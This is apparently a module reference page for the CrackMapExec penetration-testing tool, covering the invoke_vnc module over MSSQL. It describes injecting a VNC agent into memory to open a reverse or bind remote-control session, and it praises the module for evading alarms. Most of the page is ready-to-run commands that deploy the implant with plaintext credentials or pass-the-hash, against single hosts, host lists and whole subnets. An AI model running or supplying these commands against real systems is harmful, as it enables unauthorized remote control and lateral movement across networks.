CrackMapExec Invoke_vnc (mssql)
This page contains detailed information about how to use the invoke_vnc CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This modules injects a VNC agent in memory and initiates a reverse connection, or binds to a specified port. It works by executing the Invoke-VNC.ps1 PowerShell module.
The invoke_vnc module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.
Supported Protocols
- mssql
- smb
Module Source Code
Authors
Module Options
Here is a complete list of invoke_vnc module options:
# cme mssql -M invoke_vnc --options
[*] invoke_vnc module options:
CONTYPE Specifies the VNC connection type, choices are: reverse, bind (default: reverse).
PORT VNC Port (default: 5900)
PASSWORD Specifies the connection password.
The PASSWORD option is required! Make sure to set it when using this module.
Module Usage
This is how to use the invoke_vnc module while using the mssql protocol:
Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M invoke_vnc -o PASSWORD=<password>
Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M invoke_vnc -o PASSWORD=s3cr3t
Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M invoke_vnc -o PASSWORD=s3cr3t
CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:
# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M invoke_vnc -o PASSWORD=s3cr3t
The invoke_vnc module can be also used against multiple hosts. Here's how to run it against multiple hosts:# cme mssql target_list.txt -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M invoke_vnc -o PASSWORD=s3cr3t
References
Version
This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.